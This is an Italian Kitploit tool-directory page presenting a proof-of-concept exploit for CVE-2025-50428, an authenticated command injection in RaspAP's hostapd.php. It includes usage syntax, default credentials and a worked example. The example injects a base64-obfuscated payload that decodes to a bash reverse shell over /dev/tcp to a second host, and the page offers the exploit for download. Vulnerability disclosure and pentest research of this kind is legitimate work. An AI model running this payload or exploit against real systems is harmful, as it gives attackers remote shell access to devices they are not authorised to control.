Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-50428 — Prova di concetto per la vulnerabilità CVE-2025-50428: Iniezione autenticata di comandi di sistema in RaspAP | Kitploit
Strumenti/GitHubGitHub/security-smarttecs/cve-2025-50428
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e Formazione
GitHubsecurity-smarttecs/cve-2025-50428

cve-2025-50428

Prova di concetto per la vulnerabilità CVE-2025-50428: Iniezione autenticata di comandi di sistema in RaspAP

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE Severity Product Version

CVE-2025-50428 - Iniezione di Comandi in RaspAP

Un proof-of-concept exploit per CVE-2025-50428, una vulnerabilità di iniezione di comandi in RaspAP raspap-webgui 3.2.9 e versioni precedenti.


ID VulnerabilitàCVE-2025-50428
GravitàAlta (CVSS 3.1: 8.6)
Vettore CVSSCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Tipo di VulnerabilitàIniezione di Codice
Vettore di AttaccoRemoto (Autenticato)
Privilegi RichiestiBassi
ImpattoEsecuzione di Codice, Escalation dei Privilegi
Prodotto Interessatoraspap-webgui ≤ 3.2.9
Scoperta daSmartTECS Cyber Security GmbH

Descrizione

Questo exploit prende di mira una vulnerabilità di iniezione di comandi nello script hostapd.php di RaspAP. La vulnerabilità è dovuta a una sanitizzazione impropria dell'input utente passato tramite il parametro interface. Un utente malintenzionato autenticato può iniettare comandi OS arbitrari, ottenendo l'esecuzione di codice con i privilegi dell'utente www-data.

Versioni Vulnerabili

  • raspap-webgui ≤ 3.2.9

Requisiti

  • Python 3.x
  • libreria requests installata
  • Target che esegue una versione vulnerabile di RaspAP
  • Credenziali di accesso RaspAP valide

Utilizzo

root@kitploit:~
python3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]

Parametri

  • --base-url: URL di base dell'installazione di RaspAP (es., http://192.168.122.22)
  • --interface: Valore per il parametro interface, è consentito un payload di iniezione
  • --username: Nome utente RaspAP (predefinito: admin)
  • --password: Password RaspAP (predefinita: secret)

Esempio

root@kitploit:~
python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"

Come Funziona

  1. Lo script si autentica all'interfaccia web di RaspAP utilizzando le credenziali fornite.
  2. Recupera un token CSRF valido dal server.
  3. Una richiesta POST viene inviata a hostapd.php con il parametro interface contenente un payload malevolo di iniezione di comandi.
  4. I comandi iniettati vengono eseguiti sul sistema target con i privilegi di www-data.

Note

  • L'exploit richiede credenziali valide.
  • Un exploit riuscito consente l'esecuzione arbitraria di comandi, che può essere concatenata per l'escalation dei privilegi.

SmartTECS Cyber Security GmbH

SmartTECS Cyber Security GmbH è un'azienda di cybersecurity specializzata in penetration testing, sviluppo software sicuro e ricerca sulle vulnerabilità. L'azienda fornisce valutazioni della sicurezza su misura, servizi di incident response e consulenza strategica per aiutare le organizzazioni a proteggere i sistemi critici dalle minacce informatiche in evoluzione.

Dichiarazione di Non Responsabilità

Questo strumento è fornito esclusivamente a scopo educativo e di ricerca. Utilizzarlo solo su sistemi di propria proprietà o amministrati con esplicita autorizzazione. L'autore e SmartTECS Cyber Security GmbH declinano ogni responsabilità per usi impropri o danni.

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2025-50428
Scarica lo strumento